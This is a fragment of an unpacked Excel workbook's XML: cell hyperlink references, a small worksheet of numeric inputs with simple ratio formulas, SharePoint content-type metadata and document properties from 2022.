    <hyperlink ref="D526" r:id="rId450" xr:uid="{5F0E60D6-6DE6-FE4C-94A1-1CC6F2C8D9C5}"/>
    <hyperlink ref="D528" r:id="rId451" xr:uid="{6EDF4EC0-AF09-D84B-A8A7-2B5E7A6F6FF9}"/>
    <hyperlink ref="D530" r:id="rId452" xr:uid="{04CEAD7E-D625-D845-A105-BC27527956B0}"/>
    <hyperlink ref="D527" r:id="rId453" xr:uid="{EF611C2F-5C2B-AE4E-9989-383CAAD72E52}"/>
    <hyperlink ref="D518" r:id="rId454" xr:uid="{A4A705AE-0FE5-C54D-B831-453135CB8EA4}"/>
    <hyperlink ref="D520" r:id="rId455" xr:uid="{8E789A67-D761-334A-AEB1-560CED56EFAA}"/>
    <hyperlink ref="D519" r:id="rId456" xr:uid="{54D1E41E-D8A1-4346-BCD8-E5E2E2C7BF1B}"/>
    <hyperlink ref="D521" r:id="rId457" xr:uid="{03655156-73EF-AB43-86F1-B20C58F1887B}"/>
    <hyperlink ref="D284" r:id="rId458" xr:uid="{DE152795-8999-4740-91D1-4259DA94C8D9}"/>
    <hyperlink ref="D288" r:id="rId459" xr:uid="{65FACE0C-CFFC-574B-B41D-400B27B78DE5}"/>
    <hyperlink ref="D285" r:id="rId460" xr:uid="{D7F67B51-E9BD-5547-9571-0925A82064B0}"/>
    <hyperlink ref="D286" r:id="rId461" xr:uid="{DACD6FBD-6D10-0A4E-B563-1EBD0E409A4D}"/>
    <hyperlink ref="D287" r:id="rId462" xr:uid="{0D2C541C-FD2F-6A43-9730-59F202CB0F7D}"/>
    <hyperlink ref="D265" r:id="rId463" xr:uid="{23A4DA21-44D9-A549-803F-004ED35E2136}"/>
    <hyperlink ref="D181" r:id="rId464" xr:uid="{45938AA0-1204-6D4B-9E68-14C47A98F0BE}"/>
    <hyperlink ref="D237" r:id="rId465" xr:uid="{2C02FD0B-F91F-3B44-8050-79150D18797F}"/>
    <hyperlink ref="D240" r:id="rId466" xr:uid="{8D747DB6-9C5D-B743-85D1-5B1D74DA29A3}"/>
    <hyperlink ref="D238" r:id="rId467" xr:uid="{2092DBED-F15C-C340-B69A-082E9ECAF05E}"/>
    <hyperlink ref="D239" r:id="rId468" xr:uid="{1F25A74D-AD22-A546-AFF8-BA4613D5FADE}"/>
    <hyperlink ref="D241" r:id="rId469" xr:uid="{70527750-DE8F-A14E-9550-150BF849C876}"/>
    <hyperlink ref="D250" r:id="rId470" xr:uid="{19446C01-B0C8-3547-9F9E-9A06A5286AE6}"/>
    <hyperlink ref="D249" r:id="rId471" xr:uid="{52AD6036-7EC3-DC43-BB5E-D918653F2764}"/>
    <hyperlink ref="D242" r:id="rId472" xr:uid="{098C62C2-224E-A849-BA38-A7D4857B5FD3}"/>
    <hyperlink ref="D243" r:id="rId473" xr:uid="{B61FCAE5-A662-AE47-A382-3C1E90BCACB0}"/>
    <hyperlink ref="D244" r:id="rId474" xr:uid="{631D4328-384F-944A-8228-72345C72E0D4}"/>
    <hyperlink ref="D245" r:id="rId475" xr:uid="{89BE8E82-1D11-2649-A100-A038B716694F}"/>
    <hyperlink ref="D246" r:id="rId476" xr:uid="{BCF3684B-B2ED-AA4E-A823-9338429B8592}"/>
    <hyperlink ref="D247" r:id="rId477" xr:uid="{2522C050-6B05-C845-947B-3072A8FCC778}"/>
    <hyperlink ref="D248" r:id="rId478" xr:uid="{CE4DFD39-915F-814A-AC05-FCA843AD5846}"/>
    <hyperlink ref="D234" r:id="rId479" xr:uid="{F6B8DA3F-4D4E-344E-B7B4-552C320EC22D}"/>
    <hyperlink ref="D235" r:id="rId480" xr:uid="{5CD95333-4E6D-7740-A52B-93A0376A9D37}"/>
    <hyperlink ref="D124" r:id="rId481" xr:uid="{6E32DB7F-99D5-344B-9BB2-2B53F558AC5C}"/>
    <hyperlink ref="D289" r:id="rId482" xr:uid="{64C3DDF4-7A0A-5947-8E39-0DC82D75F364}"/>
    <hyperlink ref="D290" r:id="rId483" xr:uid="{CC8E93EB-94F1-704A-AC68-A5E5758A2801}"/>
    <hyperlink ref="D552" r:id="rId484" xr:uid="{C3870605-CB88-3544-BF04-378D17D91299}"/>
    <hyperlink ref="D556" r:id="rId485" xr:uid="{7FE57736-D3B1-7041-8BC1-058D46B2C9ED}"/>
    <hyperlink ref="D555" r:id="rId486" xr:uid="{539F8F08-CB50-9140-A1A2-D906C15ACBBC}"/>
    <hyperlink ref="D557" r:id="rId487" xr:uid="{1DEC0867-EB33-6C47-89FC-1C0A0AD1C24B}"/>
    <hyperlink ref="D553" r:id="rId488" xr:uid="{2694323C-EDBB-E24F-A68D-CF0E7391021B}"/>
    <hyperlink ref="D554" r:id="rId489" xr:uid="{DBC3ED7E-C430-694E-944A-4731DFE750AB}"/>
    <hyperlink ref="D293" r:id="rId490" xr:uid="{A3F11C24-B6A4-FB47-AC5E-F8B38DC96B64}"/>
    <hyperlink ref="D301" r:id="rId491" xr:uid="{FB6B3A8A-C2E3-6B4A-9532-3D2799A41045}"/>
    <hyperlink ref="D385" r:id="rId492" xr:uid="{64588D8A-E14C-1642-82F0-83345F0A01FC}"/>
    <hyperlink ref="D389" r:id="rId493" xr:uid="{46228FEA-956E-0244-A39F-09649CC55AFB}"/>
    <hyperlink ref="D386" r:id="rId494" xr:uid="{25E6AD51-3112-AB43-AAA1-09B2D849A07D}"/>
    <hyperlink ref="D388" r:id="rId495" xr:uid="{320DC1FC-39B3-3841-BA27-F87F56C3CE0E}"/>
    <hyperlink ref="D387" r:id="rId496" xr:uid="{2CED079D-E939-434F-8E22-F9EF557F6848}"/>
    <hyperlink ref="D363" r:id="rId497" xr:uid="{77923945-FE7D-BD42-8A8B-16552DA8C9D2}"/>
    <hyperlink ref="D365" r:id="rId498" xr:uid="{7E120296-C30F-E042-86A5-AE34FC72B2C0}"/>
    <hyperlink ref="D369" r:id="rId499" xr:uid="{B056488F-2713-594B-B37B-1E1D1E648546}"/>
    <hyperlink ref="D364" r:id="rId500" xr:uid="{06C866F8-E17E-F64B-AC37-0D481D084D5B}"/>
    <hyperlink ref="D367" r:id="rId501" xr:uid="{AFC5D838-6116-5A40-82DF-D55F15D57232}"/>
    <hyperlink ref="D368" r:id="rId502" xr:uid="{CFF944D0-85C3-CC47-9612-EE89E92043F9}"/>
    <hyperlink ref="D366" r:id="rId503" xr:uid="{D4DEAD17-E815-5D42-A46C-20F0A39FFD72}"/>
    <hyperlink ref="D210" r:id="rId504" xr:uid="{3A04E011-2191-D641-B338-BEE4A981C8DE}"/>
    <hyperlink ref="D213" r:id="rId505" xr:uid="{B1E95B23-45AF-F541-A79C-22E2F150C175}"/>
    <hyperlink ref="D211" r:id="rId506" xr:uid="{65A4FB2D-DCDE-F448-BD98-C29D8DDFCF4D}"/>
    <hyperlink ref="D212" r:id="rId507" xr:uid="{77A3A930-D581-C54D-BA47-E2F15A929E4B}"/>
    <hyperlink ref="D134" r:id="rId508" xr:uid="{8B949A7C-6F75-D840-A0C3-592F732B04AA}"/>
    <hyperlink ref="D563" r:id="rId509" xr:uid="{4F11D2B9-3566-854B-A321-5B9FAB755A0B}"/>
    <hyperlink ref="D564" r:id="rId510" xr:uid="{39891E4C-EC3D-4048-A4A1-32CCE621FCA7}"/>
    <hyperlink ref="D24" r:id="rId511" xr:uid="{41D46E9E-F51D-4B42-9CA4-8E95CD5A9D04}"/>
    <hyperlink ref="D25" r:id="rId512" xr:uid="{15EB2C35-9F8D-994D-A75B-2345FDD3218F}"/>
    <hyperlink ref="D70" r:id="rId513" xr:uid="{5EFECB26-A177-BA41-953C-30302D191C44}"/>
    <hyperlink ref="D46" r:id="rId514" xr:uid="{A86DED6E-D079-5D4A-B28C-5C56953C73E8}"/>
    <hyperlink ref="D17" r:id="rId515" xr:uid="{AC7DCC98-3D2D-8E48-BDE9-68079FB814E7}"/>
    <hyperlink ref="D438" r:id="rId516" xr:uid="{668D0848-CD93-F946-B427-A62C494BADE7}"/>
    <hyperlink ref="D439" r:id="rId517" xr:uid="{4F3E72E4-B2F6-D749-8751-4BAEA0C322C9}"/>
    <hyperlink ref="D440" r:id="rId518" xr:uid="{A4D2B383-E224-8F49-8F97-9171A1B069D5}"/>
    <hyperlink ref="D294" r:id="rId519" xr:uid="{DC265B91-795C-A44A-8B80-E849EF0CA3F2}"/>
    <hyperlink ref="D177" r:id="rId520" xr:uid="{CA096837-CAFC-4240-8675-F75C112A3F71}"/>
    <hyperlink ref="D133" r:id="rId521" xr:uid="{FBE29881-D1C4-1D48-8932-F05D24CA4AB9}"/>
    <hyperlink ref="D253" r:id="rId522" xr:uid="{164061F6-2B56-184E-B862-657E8A777F79}"/>
    <hyperlink ref="D224" r:id="rId523" xr:uid="{E8879B3D-45D5-8B4F-99D4-D2D687DB0127}"/>
    <hyperlink ref="D225" r:id="rId524" xr:uid="{CA657407-4EB4-7D40-BA8F-CF6F08F4442B}"/>
    <hyperlink ref="D299" r:id="rId525" xr:uid="{FA0497E7-DD34-714C-ADA7-AE7C16F98407}"/>
    <hyperlink ref="D179" r:id="rId526" xr:uid="{3F0B165D-17FF-B049-979A-3ED42CE93B81}"/>
    <hyperlink ref="D180" r:id="rId527" xr:uid="{DFA1F99E-A5CE-374C-A4F9-0DE582A00D95}"/>
    <hyperlink ref="D215" r:id="rId528" xr:uid="{8952ADDD-132C-DE45-84F4-E48E3BE6C3FE}"/>
    <hyperlink ref="D166" r:id="rId529" xr:uid="{CC56B45E-CA23-474F-84A8-877F54080151}"/>
    <hyperlink ref="D355" r:id="rId530" xr:uid="{FFC50C2F-0441-3D49-B863-C933BD9B9C7D}"/>
    <hyperlink ref="D358" r:id="rId531" xr:uid="{6A93C330-24CF-9B4F-8FB8-590B6B25FD04}"/>
    <hyperlink ref="D360" r:id="rId532" xr:uid="{43981415-63D6-394B-92BF-AFA6E0136ABE}"/>
    <hyperlink ref="D362" r:id="rId533" xr:uid="{01299234-4B14-FA44-BF7F-64E815709246}"/>
    <hyperlink ref="D356" r:id="rId534" xr:uid="{E5D2750E-2E20-DB4D-8358-CDAE5FC31CF4}"/>
    <hyperlink ref="D357" r:id="rId535" xr:uid="{38F5E2CE-1FB4-9545-B6F0-1F4A8A7BBD7A}"/>
    <hyperlink ref="D361" r:id="rId536" xr:uid="{2C32CE72-7DB5-A84D-9132-F0D986F73630}"/>
    <hyperlink ref="D359" r:id="rId537" xr:uid="{7DFFD4AD-AB0F-3740-92EC-C3EB59359025}"/>
    <hyperlink ref="D298" r:id="rId538" xr:uid="{2EBBBCCF-F5B1-9E40-9FB1-621D12348B16}"/>
    <hyperlink ref="D350" r:id="rId539" xr:uid="{E74629C7-367F-1341-AF4D-8AD4C3256870}"/>
    <hyperlink ref="D351" r:id="rId540" xr:uid="{31EC61DF-560D-994D-B72D-A9E23B82D6FD}"/>
    <hyperlink ref="D352" r:id="rId541" xr:uid="{4AEAA44C-9D32-7945-AFAA-250167D957A1}"/>
    <hyperlink ref="D353" r:id="rId542" xr:uid="{D8661098-5510-C74B-AFF5-40C3751DA70C}"/>
    <hyperlink ref="D354" r:id="rId543" xr:uid="{FBB5F98C-A757-8A45-9FE3-969814E65DD4}"/>
    <hyperlink ref="D220" r:id="rId544" xr:uid="{AC608904-128E-4E49-9484-D6B5172F78C0}"/>
    <hyperlink ref="D222" r:id="rId545" xr:uid="{036CB1D6-40B8-A04D-BB88-685DFB5C46AD}"/>
    <hyperlink ref="D223" r:id="rId546" xr:uid="{3E345245-C549-2E4A-95A0-9832F5AAA05B}"/>
    <hyperlink ref="D221" r:id="rId547" xr:uid="{3BE15131-31F2-6E44-BD8F-F1B6790CB954}"/>
    <hyperlink ref="D128" r:id="rId548" xr:uid="{FD2CEBE0-5DA5-1E4E-A15D-CCE26FE3B282}"/>
    <hyperlink ref="D132" r:id="rId549" xr:uid="{09503794-4B3A-F647-85FB-9CB7491DB304}"/>
    <hyperlink ref="D129" r:id="rId550" xr:uid="{F83EB264-04F2-4942-A4AE-5112E4BF2021}"/>
    <hyperlink ref="D130" r:id="rId551" xr:uid="{EF0ECC6F-42D1-5D4B-969D-6346CAE4F7D1}"/>
    <hyperlink ref="D131" r:id="rId552" xr:uid="{BAD1F196-8038-8042-A319-79785E977F52}"/>
    <hyperlink ref="D178" r:id="rId553" xr:uid="{A6A30F99-4FDD-1E40-98C6-5D34897C62A5}"/>
    <hyperlink ref="D272" r:id="rId554" xr:uid="{56333DD5-705D-D045-AB5D-44F1DCC1BDEF}"/>
    <hyperlink ref="D273" r:id="rId555" xr:uid="{F8F99949-4C29-FD42-9547-45CF8B13A65E}"/>
    <hyperlink ref="D275" r:id="rId556" xr:uid="{5170DDAD-6E9A-F644-9F8B-FD2A096C4DFD}"/>
    <hyperlink ref="D274" r:id="rId557" xr:uid="{760B44BD-9A90-794F-8AF0-20ABD6B0909B}"/>
    <hyperlink ref="D540" r:id="rId558" xr:uid="{66CF96DC-C40B-E847-83B2-BDB001B138EA}"/>
    <hyperlink ref="D542" r:id="rId559" xr:uid="{3E1F47D9-9B3C-F241-903E-97F9F3513B87}"/>
    <hyperlink ref="D541" r:id="rId560" xr:uid="{5238D44B-6B86-F94D-B2C2-8B2A4BD10681}"/>
    <hyperlink ref="D154" r:id="rId561" xr:uid="{C8183218-2A05-8449-85C2-8E5512ECF445}"/>
    <hyperlink ref="D156" r:id="rId562" xr:uid="{34DEAA1F-A29B-564D-9E50-CF102C7CC8B2}"/>
    <hyperlink ref="D155" r:id="rId563" xr:uid="{FF33D529-C6E2-6547-85BE-AE311FA7F3C5}"/>
    <hyperlink ref="D157" r:id="rId564" xr:uid="{5DFF6AE5-9153-2D40-92A9-389831302E72}"/>
    <hyperlink ref="D65" r:id="rId565" xr:uid="{C977B9CD-1C7D-B442-BEDB-6903173A5C07}"/>
    <hyperlink ref="D252" r:id="rId566" xr:uid="{C0DD2F13-B48A-EF44-97B5-E445A8228C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C4806-42DF-D744-AC71-7B6F749F8478}">
  <dimension ref="A1:AV28"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="C14" sqref="C14"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="11" defaultRowHeight="15.95"/>
  <cols>
    <col min="1" max="1" width="22.5" customWidth="1"/>
    <col min="2" max="2" width="25.625" customWidth="1"/>
    <col min="3" max="3" width="60" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:48">
      <c r="B1" t="s">
        <v>4649</v>
      </c>
      <c r="C1" t="s">
        <v>4650</v>
      </c>
      <c r="D1" t="s">
        <v>4651</v>
      </c>
    </row>
    <row r="2" spans="1:48">
      <c r="A2" t="s">
        <v>4652</v>
      </c>
      <c r="B2" t="s">
        <v>4653</v>
      </c>
      <c r="C2" t="s">
        <v>4654</v>
      </c>
      <c r="D2" s="50">
        <v>0</v>
      </c>
      <c r="I2" t="s">
        <v>4655</v>
      </c>
      <c r="J2">
        <f>1</f>
        <v>1</v>
      </c>
    </row>
    <row r="3" spans="1:48">
      <c r="B3" t="s">
        <v>4656</v>
      </c>
      <c r="C3" t="s">
        <v>4657</v>
      </c>
      <c r="D3" s="50">
        <v>55</v>
      </c>
      <c r="I3" t="s">
        <v>4658</v>
      </c>
      <c r="J3">
        <f>J2/D6*(D5-D4)/(D3-D2)</f>
        <v>0.90909090909090906</v>
      </c>
    </row>
    <row r="4" spans="1:48">
      <c r="B4" t="s">
        <v>4659</v>
      </c>
      <c r="C4" t="s">
        <v>4660</v>
      </c>
      <c r="D4" s="50">
        <v>0</v>
      </c>
      <c r="I4" t="s">
        <v>4661</v>
      </c>
      <c r="J4">
        <f>J2/(J3+J2)</f>
        <v>0.52380952380952384</v>
      </c>
      <c r="AV4" t="s">
        <v>4662</v>
      </c>
    </row>
    <row r="5" spans="1:48">
      <c r="B5" t="s">
        <v>4663</v>
      </c>
      <c r="C5" t="s">
        <v>4664</v>
      </c>
      <c r="D5" s="50">
        <v>100</v>
      </c>
      <c r="I5" t="s">
        <v>4665</v>
      </c>
      <c r="J5">
        <f>J3/(J3+J2)</f>
        <v>0.47619047619047616</v>
      </c>
    </row>
    <row r="6" spans="1:48">
      <c r="B6" t="s">
        <v>4666</v>
      </c>
      <c r="D6" s="50">
        <v>2</v>
      </c>
    </row>
    <row r="7" spans="1:48">
      <c r="D7" s="50"/>
    </row>
    <row r="8" spans="1:48">
      <c r="A8" t="s">
        <v>4667</v>
      </c>
      <c r="B8" t="s">
        <v>4668</v>
      </c>
      <c r="D8" s="50">
        <v>0</v>
      </c>
      <c r="I8" t="s">
        <v>4669</v>
      </c>
      <c r="J8">
        <f>1</f>
        <v>1</v>
      </c>
    </row>
    <row r="9" spans="1:48">
      <c r="B9" t="s">
        <v>4670</v>
      </c>
      <c r="D9" s="50">
        <v>10</v>
      </c>
      <c r="I9" t="s">
        <v>4671</v>
      </c>
      <c r="J9">
        <f>J8/D12*(D11-D10)/(D9-D8)</f>
        <v>1</v>
      </c>
    </row>
    <row r="10" spans="1:48">
      <c r="B10" t="s">
        <v>4672</v>
      </c>
      <c r="D10" s="50">
        <v>0</v>
      </c>
      <c r="I10" t="s">
        <v>4673</v>
      </c>
      <c r="J10">
        <f>J8/(J9+J8)</f>
        <v>0.5</v>
      </c>
    </row>
    <row r="11" spans="1:48">
      <c r="B11" t="s">
        <v>4674</v>
      </c>
      <c r="D11" s="50">
        <v>10</v>
      </c>
      <c r="I11" t="s">
        <v>4675</v>
      </c>
      <c r="J11">
        <f>J9/(J9+J8)</f>
        <v>0.5</v>
      </c>
    </row>
    <row r="12" spans="1:48">
      <c r="B12" t="s">
        <v>4676</v>
      </c>
      <c r="D12" s="50">
        <v>1</v>
      </c>
    </row>
    <row r="13" spans="1:48">
      <c r="D13" s="50"/>
    </row>
    <row r="14" spans="1:48">
      <c r="A14" t="s">
        <v>34</v>
      </c>
      <c r="B14" t="s">
        <v>4677</v>
      </c>
      <c r="D14" s="67">
        <v>44370</v>
      </c>
    </row>
    <row r="15" spans="1:48">
      <c r="B15" t="s">
        <v>4678</v>
      </c>
      <c r="D15" s="50">
        <v>365</v>
      </c>
    </row>
    <row r="16" spans="1:48">
      <c r="B16" t="s">
        <v>4679</v>
      </c>
      <c r="D16" s="50">
        <v>365</v>
      </c>
    </row>
    <row r="17" spans="1:10">
      <c r="B17" t="s">
        <v>4680</v>
      </c>
      <c r="D17" s="50">
        <v>0.5</v>
      </c>
    </row>
    <row r="18" spans="1:10">
      <c r="D18" s="50"/>
    </row>
    <row r="19" spans="1:10">
      <c r="A19" t="s">
        <v>4681</v>
      </c>
      <c r="B19" t="s">
        <v>4682</v>
      </c>
      <c r="D19" s="50">
        <v>0</v>
      </c>
      <c r="I19" t="s">
        <v>4683</v>
      </c>
      <c r="J19">
        <f>1</f>
        <v>1</v>
      </c>
    </row>
    <row r="20" spans="1:10">
      <c r="B20" t="s">
        <v>4684</v>
      </c>
      <c r="D20" s="50">
        <v>3</v>
      </c>
      <c r="I20" t="s">
        <v>4685</v>
      </c>
      <c r="J20">
        <f>J19/D23*(D22-D21)/(D20-D19)</f>
        <v>2.3333333333333335</v>
      </c>
    </row>
    <row r="21" spans="1:10">
      <c r="B21" t="s">
        <v>4686</v>
      </c>
      <c r="D21" s="50">
        <v>0</v>
      </c>
      <c r="I21" t="s">
        <v>4687</v>
      </c>
      <c r="J21">
        <f>J19/(J19+J20)</f>
        <v>0.3</v>
      </c>
    </row>
    <row r="22" spans="1:10">
      <c r="B22" t="s">
        <v>4688</v>
      </c>
      <c r="D22" s="50">
        <v>21</v>
      </c>
      <c r="I22" t="s">
        <v>4689</v>
      </c>
      <c r="J22">
        <f>J20/(J19+J20)</f>
        <v>0.70000000000000007</v>
      </c>
    </row>
    <row r="23" spans="1:10">
      <c r="B23" t="s">
        <v>4690</v>
      </c>
      <c r="D23" s="50">
        <v>3</v>
      </c>
    </row>
    <row r="24" spans="1:10">
      <c r="D24" s="68"/>
    </row>
    <row r="25" spans="1:10">
      <c r="D25" s="68"/>
    </row>
    <row r="26" spans="1:10">
      <c r="D26" s="68"/>
    </row>
    <row r="27" spans="1:10">
      <c r="D27" s="68"/>
    </row>
    <row r="28" spans="1:10">
      <c r="D28" s="6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51EEE5EE5EA045A41DD910FB44BEF4" ma:contentTypeVersion="6" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="011380f4e1b8b8267dff01dfe72785bd">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="52bc348a-5c26-473b-8a59-242be8c8d3aa" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="2bf703c83c090e8412f191dcabdef054" ns2:_="">
    <xsd:import namespace="52bc348a-5c26-473b-8a59-242be8c8d3a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bc348a-5c26-473b-8a59-242be8c8d3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BE193C1-9EFF-4043-B108-6ECC8E99263A}"/>
</file>

<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{6C89E003-E3FB-401B-8760-D14599C1D5A9}"/>
</file>

<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{581AAC2E-03C4-480A-96B4-5396597FA94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Mike Cunningham</cp:lastModifiedBy>
  <cp:revision/>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-01-13T14:59:20Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-05-05T14:28:12Z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0x010100E351EEE5EE5EA045A41DD910FB44BEF4</vt:lpwstr>
  </property>
</Properties>
</file>